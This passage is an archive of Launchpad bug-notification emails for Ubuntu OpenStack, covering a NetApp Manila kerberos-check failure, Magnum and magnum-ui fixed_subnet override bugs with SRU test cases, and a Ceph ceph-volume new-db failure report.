"/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/utils.py", line 115, in trace_wrapper 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server result = f(self, *args, **kwargs) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/dataontap/protocols/base.py", line 34, in wrapped_func 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server return source_func(self, *args, **kwargs) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/oslo_concurrency/lockutils.py", line 414, in inner 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server return f(*args, **kwargs) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/dataontap/protocols/base.py", line 32, in source_func 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server return f(self, *args, **kwargs) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/dataontap/protocols/nfs_cmode.py", line 114, in update_access 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server auth_methods = self._get_auth_methods() 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/utils.py", line 115, in trace_wrapper 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server result = f(self, *args, **kwargs) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/dataontap/protocols/nfs_cmode.py", line 221, in _get_auth_methods 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server kerberos_enabled = self._client.is_kerberos_enabled() 2024-05-27 15:43:57.077 19 ERROR 
oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/utils.py", line 115, in trace_wrapper 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server result = f(self, *args, **kwargs) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/dataontap/client/client_cmode.py", line 2042, in is_kerberos_enabled 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server result = self.send_request('kerberos-config-get', api_args) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/dataontap/client/client_base.py", line 89, in send_request 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server return self.connection.invoke_successfully( 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/dataontap/client/api.py", line 717, in invoke_successfully 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server return self.get_client(use_zapi=use_zapi).invoke_successfully( 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/dataontap/client/api.py", line 388, in invoke_successfully 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server raise NaApiError(code, msg) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server manila.share.drivers.netapp.dataontap.client.api.NaApiError: NetApp API failed. 
Reason - 15661:entry doesn't exist 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server 2024-05-27 15:44:08.487 19 INFO manila.share.manager [None req-4bfe58a9-a794-497d-8b75-7ee098ea0e11 - - - - - -] Updating share status =============== SRU DESCRIPTION =============== [Impact] The NetApp driver kerberos-config-get call fails when using an SVM-scoped user because it does not have enough privileges to perform that check. This failure causes the entire stack to fail, thus preventing access rules from being added to shares. The fix addresses this by capturing the exception and not re-raising it, allowing the operation to continue. [Test case] Testing around this is limited because: 1) The NetApp CI upstream is broken at this time. The fix was validated internally by contributors and NetApp driver maintainers. 2) We do not have a NetApp box in our lab to verify the SRU for this scenario. 3) Running the Manila tempest suite is useless because the change is limited in scope to the NetApp driver, which is only operational when using NetApp storage. [Regression Potential] Given that the change is limited to the NetApp driver, is small, and was peer-validated, we consider the regression potential minimal. [Other Info] None. 
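The shape of that fix can be sketched as follows. This is a minimal sketch reconstructed from the traceback above; the `NaApiError` stand-in, the trimmed client class, and the `'is-enabled'` field name are assumptions, and the actual upstream patch may differ in detail:

```python
class NaApiError(Exception):
    """Stand-in for manila.share.drivers.netapp.dataontap.client.api.NaApiError."""
    def __init__(self, code, message):
        super().__init__("NetApp API failed. Reason - %s:%s" % (code, message))
        self.code = code


class CmodeClient:
    """Hypothetical, trimmed-down client illustrating the exception capture."""

    def send_request(self, api_name, api_args=None):
        # An SVM-scoped user lacks the privileges for this cluster-level
        # check, so ONTAP answers with error 15661, as in the log above.
        raise NaApiError('15661', "entry doesn't exist")

    def is_kerberos_enabled(self):
        try:
            result = self.send_request('kerberos-config-get', None)
        except NaApiError:
            # Capture the exception instead of re-raising it: assume
            # kerberos is disabled when the user cannot perform the check,
            # so the access-rule update can continue.
            return False
        # 'is-enabled' is an illustrative field name, not the real ZAPI key.
        return result.get_child_content('is-enabled') == 'true'
```

With the exception captured, `_get_auth_methods()` (seen in the traceback) can fall back to non-kerberos auth methods and the access-rule update completes instead of erroring out.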
To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2069125/+subscriptions From 2038663 at bugs.launchpad.net Thu Aug 1 15:44:09 2024 From: 2038663 at bugs.launchpad.net (Felipe Reyes) Date: Thu, 01 Aug 2024 15:44:09 -0000 Subject: [Bug 2038663] Re: [SRU] no option to override the fixed_subnet when creating a new cluster References: <169659880082.470726.6502280352779991684.malonedeb@juju-98d295-prod-launchpad-3> Message-ID: <172252705056.1053747.13840698200652160383.launchpad@juju-98d295-prod-launchpad-3> ** Description changed: [Impact] When a cluster template sets fixed_network and fixed_subnet and the user tries to create a new cluster using that template and decides to override the network, the fixed_subnet will inherited from the template, leaving an invalid configuration and later Neutron will refuse to allocate a port (since the subnet doesn't belong to the network). For more details see https://bugs.launchpad.net/ubuntu/+source/magnum/+bug/2038109 [Test Case] - 1. Create a new cluster template with a fixed_network test-net and fixed_subnet test-subnet - 2. Create a new cluster, uncheck the option "Create new network" and pick a network different from test-net in the dropdown list. + 1. Deploy an OpenStack cloud with the magnum-ui extension installed. + ``` + git clone https://opendev.org/openstack/charm-magnum-dashboard + cd charm-magnum-dashboard + git checkout stable/${VERSION} # ${VERSION} can be 2023.1, yoga or ussuri. + tox -e build + tox -e func-target -- ${BUNDLE} # ${BUNDLE} can be jammy-antelope, jammy-yoga or focal-ussuri + ``` + + 2. Create a new cluster template with a fixed_network test-net and fixed_subnet test-subnet + 3. Create a new cluster, uncheck the option "Create new network" and pick a network different from test-net in the dropdown list. Expected result: The cluster gets created Actual result: The cluster creation fails, because the network configuration is invalid. 
+ + [ Where problems could occur ] + + This is a javascript (Angular) code change; issues can be detected using + the Web Developer Tools console, where a javascript exception may be + raised. + + Another source of problems is that this code change adds a handler to + repopulate the list of subnets when the network is changed in the "Fixed + Network" dropdown list; if there were issues, the subnet list would be + rendered empty. + + [ Other Info ] + + - This bug fix was merged during the 2024.1 (Caracal) development cycle - https://review.opendev.org/c/openstack/magnum-ui/+/898007 + - The commit that fixes this issue is available since magnum-ui-14.0.0 - https://opendev.org/openstack/magnum-ui/commit/6f6c3db282fe2f0e08ad69c557eb153858b0164a + - This bug fix is not relevant for upgrades, it's purely a UI fix + - This change is adding a new UI component, which on the surface may not look suitable for an SRU, although the current UI induces users to get into a broken configuration for new clusters when overriding the cluster template's network. -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive. 
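The broken inheritance can be illustrated with a small, hypothetical merge function (the real fix is Angular code in magnum-ui; `effective_network_config` and its dict shapes are illustrative only):

```python
def effective_network_config(template, overrides):
    """Merge cluster-create overrides onto a cluster template.

    Rule the UI fix enforces: when the user overrides fixed_network,
    the template's fixed_subnet must not be inherited, because that
    subnet belongs to the template's network, not the chosen one.
    """
    network = overrides.get("fixed_network") or template.get("fixed_network")
    if "fixed_network" in overrides and "fixed_subnet" not in overrides:
        # Without this branch the template's subnet leaks through and
        # Neutron later refuses to allocate a port on the new network.
        subnet = None
    else:
        subnet = overrides.get("fixed_subnet") or template.get("fixed_subnet")
    return {"fixed_network": network, "fixed_subnet": subnet}


template = {"fixed_network": "test-net", "fixed_subnet": "test-subnet"}
# Overriding only the network must also drop the inherited subnet:
print(effective_network_config(template, {"fixed_network": "other-net"}))
# -> {'fixed_network': 'other-net', 'fixed_subnet': None}
```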
https://bugs.launchpad.net/bugs/2038663 Title: [SRU] no option to override the fixed_subnet when creating a new cluster Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive antelope series: New Status in Ubuntu Cloud Archive bobcat series: Won't Fix Status in Ubuntu Cloud Archive ussuri series: New Status in Ubuntu Cloud Archive yoga series: New Status in Ubuntu Cloud Archive zed series: Won't Fix Status in Magnum UI: Fix Released Status in magnum-ui package in Ubuntu: Invalid Status in magnum-ui source package in Focal: New Status in magnum-ui source package in Jammy: New Bug description: [Impact] When a cluster template sets fixed_network and fixed_subnet and the user tries to create a new cluster using that template and decides to override the network, the fixed_subnet will be inherited from the template, leaving an invalid configuration, and later Neutron will refuse to allocate a port (since the subnet doesn't belong to the network). For more details see https://bugs.launchpad.net/ubuntu/+source/magnum/+bug/2038109 [Test Case] 1. Deploy an OpenStack cloud with the magnum-ui extension installed. ``` git clone https://opendev.org/openstack/charm-magnum-dashboard cd charm-magnum-dashboard git checkout stable/${VERSION} # ${VERSION} can be 2023.1, yoga or ussuri. tox -e build tox -e func-target -- ${BUNDLE} # ${BUNDLE} can be jammy-antelope, jammy-yoga or focal-ussuri ``` 2. Create a new cluster template with a fixed_network test-net and fixed_subnet test-subnet 3. Create a new cluster, uncheck the option "Create new network" and pick a network different from test-net in the dropdown list. Expected result: The cluster gets created Actual result: The cluster creation fails, because the network configuration is invalid. [ Where problems could occur ] This is a javascript (Angular) code change; issues can be detected using the Web Developer Tools console, where a javascript exception may be raised. 
Another source of problems is that this code change adds a handler to repopulate the list of subnets when the network is changed in the "Fixed Network" dropdown list; if there were issues, the subnet list would be rendered empty. [ Other Info ] - This bug fix was merged during the 2024.1 (Caracal) development cycle - https://review.opendev.org/c/openstack/magnum-ui/+/898007 - The commit that fixes this issue is available since magnum-ui-14.0.0 - https://opendev.org/openstack/magnum-ui/commit/6f6c3db282fe2f0e08ad69c557eb153858b0164a - This bug fix is not relevant for upgrades, it's purely a UI fix - This change is adding a new UI component, which on the surface may not look suitable for an SRU, although the current UI induces users to get into a broken configuration for new clusters when overriding the cluster template's network. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2038663/+subscriptions From 2038109 at bugs.launchpad.net Thu Aug 1 15:45:52 2024 From: 2038109 at bugs.launchpad.net (Felipe Reyes) Date: Thu, 01 Aug 2024 15:45:52 -0000 Subject: [Bug 2038109] Re: Failed to create port on network , because fixed_ips included invalid subnet References: <169626300462.3522896.8941534530856169957.malonedeb@juju-98d295-prod-launchpad-3> Message-ID: <172252715355.1054752.7051891739903448902.malone@juju-98d295-prod-launchpad-3> marking Zed as won't fix, because it is EOL ** Changed in: cloud-archive/zed Status: In Progress => Won't Fix -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive. 
https://bugs.launchpad.net/bugs/2038109 Title: Failed to create port on network , because fixed_ips included invalid subnet Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive antelope series: In Progress Status in Ubuntu Cloud Archive bobcat series: In Progress Status in Ubuntu Cloud Archive ussuri series: New Status in Ubuntu Cloud Archive yoga series: New Status in Ubuntu Cloud Archive zed series: Won't Fix Status in Magnum: Fix Released Status in magnum package in Ubuntu: Confirmed Status in magnum source package in Focal: In Progress Status in magnum source package in Jammy: In Progress Bug description: [Impact] When creating a new "cluster" that overrides the fixed network defined in the cluster template but not the subnet, it would be expected that the cluster create request fails with a 400 error, since the client is submitting an invalid request. [Environment] Focal Ussuri [Test Case] 1. Create a new cluster template WITH a fixed network/subnet set. openstack coe cluster template create k8s-cluster-template \ --image fedora-coreos-32 \ --keypair testkey \ --external-network ext_net \ --flavor m1.small \ --network-driver flannel \ --coe kubernetes \ --fixed-network admin_net \ --fixed-subnet admin_subnet 2. 
Create a new cluster using the template previously created and select an existing network openstack coe cluster create \ --cluster-template k8s-cluster-template \ --timeout 120 \ --fixed-network private \ k8scluster Expected result The cluster gets created Actual result: The cluster creation fails with the following error: $ openstack coe cluster show k8scluster -f json -c faults | jq -r '.faults' { "default-master": "Resource CREATE failed: BadRequest: resources.kube_masters.resources[0].resources.kube_master_eth0: Invalid input for operation: Failed to create port on network 525df7a4-1aeb-4eae-a37f-432a809a8161, because fixed_ips included invalid subnet 30e1b4ed-811f-4226-a19d-0a56cc72fc10.\nNeutron server returns request_ids: ['req-7a55a40a-3aa3-4a67-8ecf-b2e47ae16a84']", "default-worker": "Resource CREATE failed: BadRequest: resources.kube_masters.resources[0].resources.kube_master_eth0: Invalid input for operation: Failed to create port on network 525df7a4-1aeb-4eae-a37f-432a809a8161, because fixed_ips included invalid subnet 30e1b4ed-811f-4226-a19d-0a56cc72fc10.\nNeutron server returns request_ids: ['req-7a55a40a-3aa3-4a67-8ecf-b2e47ae16a84']" } To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2038109/+subscriptions From 2038109 at bugs.launchpad.net Thu Aug 1 16:03:40 2024 From: 2038109 at bugs.launchpad.net (Felipe Reyes) Date: Thu, 01 Aug 2024 16:03:40 -0000 Subject: [Bug 2038109] Re: Failed to create port on network , because fixed_ips included invalid subnet References: <169626300462.3522896.8941534530856169957.malonedeb@juju-98d295-prod-launchpad-3> Message-ID: <172252822096.954710.13378957696633071416.malone@juju-98d295-prod-launchpad-7> marking bobcat as won't fix since it's EOL ** Patch removed: "lp2038109_zed.debdiff" https://bugs.launchpad.net/ubuntu/+source/magnum/+bug/2038109/+attachment/5798100/+files/lp2038109_zed.debdiff ** Changed in: cloud-archive/bobcat Status: In Progress => Won't Fix ** Summary 
changed: - Failed to create port on network , because fixed_ips included invalid subnet + [SRU] Failed to create port on network , because fixed_ips included invalid subnet -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive. https://bugs.launchpad.net/bugs/2038109 Title: [SRU] Failed to create port on network , because fixed_ips included invalid subnet Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive antelope series: In Progress Status in Ubuntu Cloud Archive bobcat series: Won't Fix Status in Ubuntu Cloud Archive ussuri series: New Status in Ubuntu Cloud Archive yoga series: New Status in Ubuntu Cloud Archive zed series: Won't Fix Status in Magnum: Fix Released Status in magnum package in Ubuntu: Confirmed Status in magnum source package in Focal: In Progress Status in magnum source package in Jammy: In Progress Bug description: [Impact] When creating a new "cluster"that overrides the fixed network defined in the cluster template, but not the subnet. It would be expected that the cluster create request fails with a 400 error since the client is submitting an invalid request. [Environment] Focal Ussuri [Test Case] 1. Create a new cluster template WITHOUT a fixed network/subnet set. openstack coe cluster template create k8s-cluster-template \ --image fedora-coreos-32 \ --keypair testkey \ --external-network ext_net \ --flavor m1.small \ --network-driver flannel \ --coe kubernetes \ --fixed-network admin_net \ --fixed-subnet admin_subnet 2. 
Create a new cluster using the template previously created and select an existing network openstack coe cluster create \ --cluster-template k8s-cluster-template \ --timeout 120 \ --fixed-network private \ k8scluster Expected result The cluster gets created Actual result: The cluster creation fails with the following error: $ openstack coe cluster show k8scluster -f json -c faults | jq -r '.faults' { "default-master": "Resource CREATE failed: BadRequest: resources.kube_masters.resources[0].resources.kube_master_eth0: Invalid input for operation: Failed to create port on network 525df7a4-1aeb-4eae-a37f-432a809a8161, because fixed_ips included invalid subnet 30e1b4ed-811f-4226-a19d-0a56cc72fc10.\nNeutron server returns request_ids: ['req-7a55a40a-3aa3-4a67-8ecf-b2e47ae16a84']", "default-worker": "Resource CREATE failed: BadRequest: resources.kube_masters.resources[0].resources.kube_master_eth0: Invalid input for operation: Failed to create port on network 525df7a4-1aeb-4eae-a37f-432a809a8161, because fixed_ips included invalid subnet 30e1b4ed-811f-4226-a19d-0a56cc72fc10.\nNeutron server returns request_ids: ['req-7a55a40a-3aa3-4a67-8ecf-b2e47ae16a84']" } To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2038109/+subscriptions From 2038109 at bugs.launchpad.net Thu Aug 1 16:22:20 2024 From: 2038109 at bugs.launchpad.net (Felipe Reyes) Date: Thu, 01 Aug 2024 16:22:20 -0000 Subject: [Bug 2038109] Re: [SRU] Failed to create port on network , because fixed_ips included invalid subnet References: <169626300462.3522896.8941534530856169957.malonedeb@juju-98d295-prod-launchpad-3> Message-ID: <172252934141.1804874.7957981065741209911.launchpad@juju-98d295-prod-launchpad-4> ** Description changed: [Impact] When creating a new "cluster"that overrides the fixed network defined in the cluster template, but not the subnet. 
It would be expected that the cluster create request fails with a 400 error since the client is submitting an invalid request. [Environment] Focal Ussuri [Test Case] 1. Create a new cluster template WITHOUT a fixed network/subnet set. openstack coe cluster template create k8s-cluster-template \ - --image fedora-coreos-32 \ - --keypair testkey \ - --external-network ext_net \ - --flavor m1.small \ - --network-driver flannel \ - --coe kubernetes \ - --fixed-network admin_net \ - --fixed-subnet admin_subnet +     --image fedora-coreos-32 \ +     --keypair testkey \ +     --external-network ext_net \ +     --flavor m1.small \ +     --network-driver flannel \ +     --coe kubernetes \ +     --fixed-network admin_net \ +     --fixed-subnet admin_subnet 2. Create a new cluster using the template previously created and select an existing network openstack coe cluster create \ - --cluster-template k8s-cluster-template \ - --timeout 120 \ - --fixed-network private \ - k8scluster +     --cluster-template k8s-cluster-template \ +     --timeout 120 \ +     --fixed-network private \ +     k8scluster Expected result The cluster gets created Actual result: The cluster creation fails with the following error: $ openstack coe cluster show k8scluster -f json -c faults | jq -r '.faults' { - "default-master": "Resource CREATE failed: BadRequest: resources.kube_masters.resources[0].resources.kube_master_eth0: Invalid input for operation: Failed to create port on network 525df7a4-1aeb-4eae-a37f-432a809a8161, because fixed_ips included invalid subnet 30e1b4ed-811f-4226-a19d-0a56cc72fc10.\nNeutron server returns request_ids: ['req-7a55a40a-3aa3-4a67-8ecf-b2e47ae16a84']", - "default-worker": "Resource CREATE failed: BadRequest: resources.kube_masters.resources[0].resources.kube_master_eth0: Invalid input for operation: Failed to create port on network 525df7a4-1aeb-4eae-a37f-432a809a8161, because fixed_ips included invalid subnet 30e1b4ed-811f-4226-a19d-0a56cc72fc10.\nNeutron server returns 
request_ids: ['req-7a55a40a-3aa3-4a67-8ecf-b2e47ae16a84']" +   "default-master": "Resource CREATE failed: BadRequest: resources.kube_masters.resources[0].resources.kube_master_eth0: Invalid input for operation: Failed to create port on network 525df7a4-1aeb-4eae-a37f-432a809a8161, because fixed_ips included invalid subnet 30e1b4ed-811f-4226-a19d-0a56cc72fc10.\nNeutron server returns request_ids: ['req-7a55a40a-3aa3-4a67-8ecf-b2e47ae16a84']", +   "default-worker": "Resource CREATE failed: BadRequest: resources.kube_masters.resources[0].resources.kube_master_eth0: Invalid input for operation: Failed to create port on network 525df7a4-1aeb-4eae-a37f-432a809a8161, because fixed_ips included invalid subnet 30e1b4ed-811f-4226-a19d-0a56cc72fc10.\nNeutron server returns request_ids: ['req-7a55a40a-3aa3-4a67-8ecf-b2e47ae16a84']" } + + [ Where problems could occur ] + + - This change introduces validation of the configuration passed by the + user during the creation of a new cluster, issues can be raised during + the creation of new clusters, but not for already created clusters. + + [ Other Info ] + + - The patches associated to this SRU were merged during the OpenStack 2024.1 (Caracal) devel cycle + - Patches + + https://opendev.org/openstack/magnum/commit/753baadbb8b5b4c3032d4618166b1c899a50fb07 + + https://opendev.org/openstack/magnum/commit/a8bce0bfee81218cd1c0ddcf3e2b86b96659933e -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive. 
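The validation those patches add can be sketched roughly like this (hypothetical names and data shapes; see the commits linked under [ Other Info ] for the real change):

```python
class InvalidSubnetError(Exception):
    """Stand-in for the 400 Bad Request the create request should get."""


def validate_fixed_network(cluster, template, subnets_by_network):
    """Reject a create request whose subnet is not on the chosen network.

    subnets_by_network maps network name -> set of its subnet names,
    standing in for a lookup against Neutron.
    """
    network = cluster.get("fixed_network") or template.get("fixed_network")
    subnet = cluster.get("fixed_subnet") or template.get("fixed_subnet")
    if network and subnet and subnet not in subnets_by_network.get(network, set()):
        raise InvalidSubnetError(
            "fixed_subnet %s does not belong to fixed_network %s"
            % (subnet, network))


subnets = {"admin_net": {"admin_subnet"}, "private": {"private_subnet"}}
template = {"fixed_network": "admin_net", "fixed_subnet": "admin_subnet"}
try:
    # Overriding the network while inheriting the template's subnet now
    # fails fast with a 400 instead of producing a broken Heat stack.
    validate_fixed_network({"fixed_network": "private"}, template, subnets)
except InvalidSubnetError as exc:
    print(exc)
```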
https://bugs.launchpad.net/bugs/2038109 Title: [SRU] Failed to create port on network , because fixed_ips included invalid subnet Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive antelope series: In Progress Status in Ubuntu Cloud Archive bobcat series: Won't Fix Status in Ubuntu Cloud Archive ussuri series: New Status in Ubuntu Cloud Archive yoga series: New Status in Ubuntu Cloud Archive zed series: Won't Fix Status in Magnum: Fix Released Status in magnum package in Ubuntu: Confirmed Status in magnum source package in Focal: In Progress Status in magnum source package in Jammy: In Progress Bug description: [Impact] When creating a new "cluster"that overrides the fixed network defined in the cluster template, but not the subnet. It would be expected that the cluster create request fails with a 400 error since the client is submitting an invalid request. [Environment] Focal Ussuri [Test Case] 1. Create a new cluster template WITHOUT a fixed network/subnet set. openstack coe cluster template create k8s-cluster-template \     --image fedora-coreos-32 \     --keypair testkey \     --external-network ext_net \     --flavor m1.small \     --network-driver flannel \     --coe kubernetes \     --fixed-network admin_net \     --fixed-subnet admin_subnet 2. 
Create a new cluster using the template previously created and select an existing network openstack coe cluster create \     --cluster-template k8s-cluster-template \     --timeout 120 \     --fixed-network private \     k8scluster Expected result The cluster gets created Actual result: The cluster creation fails with the following error: $ openstack coe cluster show k8scluster -f json -c faults | jq -r '.faults' {   "default-master": "Resource CREATE failed: BadRequest: resources.kube_masters.resources[0].resources.kube_master_eth0: Invalid input for operation: Failed to create port on network 525df7a4-1aeb-4eae-a37f-432a809a8161, because fixed_ips included invalid subnet 30e1b4ed-811f-4226-a19d-0a56cc72fc10.\nNeutron server returns request_ids: ['req-7a55a40a-3aa3-4a67-8ecf-b2e47ae16a84']",   "default-worker": "Resource CREATE failed: BadRequest: resources.kube_masters.resources[0].resources.kube_master_eth0: Invalid input for operation: Failed to create port on network 525df7a4-1aeb-4eae-a37f-432a809a8161, because fixed_ips included invalid subnet 30e1b4ed-811f-4226-a19d-0a56cc72fc10.\nNeutron server returns request_ids: ['req-7a55a40a-3aa3-4a67-8ecf-b2e47ae16a84']" } [ Where problems could occur ] - This change introduces validation of the configuration passed by the user during the creation of a new cluster, issues can be raised during the creation of new clusters, but not for already created clusters. 
[ Other Info ] - The patches associated with this SRU were merged during the OpenStack 2024.1 (Caracal) devel cycle - Patches + https://opendev.org/openstack/magnum/commit/753baadbb8b5b4c3032d4618166b1c899a50fb07 + https://opendev.org/openstack/magnum/commit/a8bce0bfee81218cd1c0ddcf3e2b86b96659933e To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2038109/+subscriptions From 2075541 at bugs.launchpad.net Thu Aug 1 16:44:16 2024 From: 2075541 at bugs.launchpad.net (macchese) Date: Thu, 01 Aug 2024 16:44:16 -0000 Subject: [Bug 2075541] [NEW] ceph-volume lvm new-db requires 'bluestore-block-db-size' parameter Message-ID: <172253065699.570435.7228977478945066046.malonedeb@juju-98d295-prod-launchpad-2> Public bug reported: When trying to add a new-db to an existing LVM OSD, ceph-volume lvm new-db fails requiring the 'bluestore-block-db-size' parameter, even though this bug should be resolved by https://tracker.ceph.com/issues/55260 my env: root@op1:~# lsb_release -r Release: 22.04 root@op1:~# lsb_release -rd Description: Ubuntu 22.04.4 LTS Release: 22.04 ceph-volume 18.2.0-0ubuntu3~cloud0 lv db volume: root@op1:~# lvdisplay vol_db/c1 --- Logical volume --- LV Path /dev/vol_db/c1 LV Name c1 VG Name vol_db LV UUID uCv6n3-Wa0H-0DaO-GGsc-Wa4c-VLfb-7KqG7X LV Write Access read/write LV Creation host, time op1.maas, 2024-08-01 16:27:22 +0000 LV Status available # open 0 LV Size 166.00 GiB Current LE 42496 Segments 1 Allocation inherit Read ahead sectors auto - currently set to 256 Block device 253:10 what happens when I try to add a new block.db to an OSD: root@op1:~# ceph-volume lvm new-db --osd-id 42 --osd-fsid f720deb5-70eb-4a94-8c14-ca1d07e4a21c --target vol_db/c1 --no-systemd --> Making new volume at /dev/vol_db/c1 for OSD: 42 (/var/lib/ceph/osd/ceph-42) stdout: inferring bluefs devices from bluestore path stderr: Might need DB size specification, please set Ceph bluestore-block-db-size config parameter --> failed to attach new 
volume, error code:1 --> Undoing lv tag set Failed to attach new volume: vol_db/c1 after that, despite the error, osd.42 seems to have a block.db root@op1:~# ceph-volume lvm list 42 ====== osd.42 ====== [block] /dev/ceph-f720deb5-70eb-4a94-8c14-ca1d07e4a21c/osd-block-f720deb5-70eb-4a94-8c14-ca1d07e4a21c block device /dev/ceph-f720deb5-70eb-4a94-8c14-ca1d07e4a21c/osd-block-f720deb5-70eb-4a94-8c14-ca1d07e4a21c block uuid Li93WA-x5oR-rep1-21D1-sJ9m-4lII-msenUU cephx lockbox secret cluster fsid 7dfd9e3a-a5b6-11ee-9798-619012c1bb3a cluster name ceph crush device class db device /dev/vol_db/c1 db uuid l10sEJ-a3Gt-m8AK-eXA6-qTJW-82su-VngPmP encrypted 0 osd fsid f720deb5-70eb-4a94-8c14-ca1d07e4a21c osd id 42 osdspec affinity type block vdo 0 devices /dev/sdc but the block.db doesn't actually exist, and from then on, restarting osd.42 always fails. The only solution is to remove osd.42 and re-create it with a block.db, but ceph takes a lot of time to recover from the disk delete/create commands ** Affects: ceph (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to ceph in Ubuntu. 
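As a possible interim workaround (untested here, and assuming the 166 GiB size of the target LV from the lvdisplay output above), the error message itself suggests giving ceph an explicit DB size before retrying:

```
# Possible workaround suggested by the error message (untested here):
# set an explicit DB size matching the 166 GiB LV, retry, then unset it.
ceph config set osd bluestore_block_db_size 178241142784   # 166 GiB in bytes
ceph-volume lvm new-db --osd-id 42 \
    --osd-fsid f720deb5-70eb-4a94-8c14-ca1d07e4a21c \
    --target vol_db/c1 --no-systemd
ceph config rm osd bluestore_block_db_size
```

Whether this avoids the half-applied lv-tag state described above would need to be verified on a test cluster first.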
https://bugs.launchpad.net/bugs/2075541

Title:
  ceph-volume lvm new-db requires 'bluestore-block-db-size' parameter

Status in ceph package in Ubuntu:
  New

Bug description:
  When trying to add a new-db to an existing LVM OSD, ceph-volume lvm new-db fails, requiring a 'bluestore-block-db-size' parameter, even though this should have been resolved by https://tracker.ceph.com/issues/55260

  My env:

  root@op1:~# lsb_release -r
  Release: 22.04
  root@op1:~# lsb_release -rd
  Description: Ubuntu 22.04.4 LTS
  Release: 22.04

  ceph-volume 18.2.0-0ubuntu3~cloud0

  lv db volume:

  root@op1:~# lvdisplay vol_db/c1
    --- Logical volume ---
    LV Path                /dev/vol_db/c1
    LV Name                c1
    VG Name                vol_db
    LV UUID                uCv6n3-Wa0H-0DaO-GGsc-Wa4c-VLfb-7KqG7X
    LV Write Access        read/write
    LV Creation host, time op1.maas, 2024-08-01 16:27:22 +0000
    LV Status              available
    # open                 0
    LV Size                166.00 GiB
    Current LE             42496
    Segments               1
    Allocation             inherit
    Read ahead sectors     auto
    - currently set to     256
    Block device           253:10

  What happens when I try to add a new block.db to an OSD:

  root@op1:~# ceph-volume lvm new-db --osd-id 42 --osd-fsid f720deb5-70eb-4a94-8c14-ca1d07e4a21c --target vol_db/c1 --no-systemd
  --> Making new volume at /dev/vol_db/c1 for OSD: 42 (/var/lib/ceph/osd/ceph-42)
   stdout: inferring bluefs devices from bluestore path
   stderr: Might need DB size specification, please set Ceph bluestore-block-db-size config parameter
  --> failed to attach new volume, error code:1
  --> Undoing lv tag set
  Failed to attach new volume: vol_db/c1

  After that, despite the error, osd.42 appears to have a block.db:

  root@op1:~# ceph-volume lvm list 42
  ====== osd.42 ======

    [block]       /dev/ceph-f720deb5-70eb-4a94-8c14-ca1d07e4a21c/osd-block-f720deb5-70eb-4a94-8c14-ca1d07e4a21c

        block device              /dev/ceph-f720deb5-70eb-4a94-8c14-ca1d07e4a21c/osd-block-f720deb5-70eb-4a94-8c14-ca1d07e4a21c
        block uuid                Li93WA-x5oR-rep1-21D1-sJ9m-4lII-msenUU
        cephx lockbox secret
        cluster fsid              7dfd9e3a-a5b6-11ee-9798-619012c1bb3a
        cluster name              ceph
        crush device class
        db device                 /dev/vol_db/c1
        db uuid                   l10sEJ-a3Gt-m8AK-eXA6-qTJW-82su-VngPmP
        encrypted                 0
        osd fsid                  f720deb5-70eb-4a94-8c14-ca1d07e4a21c
        osd id                    42
        osdspec affinity
        type                      block
        vdo                       0
        devices                   /dev/sdc

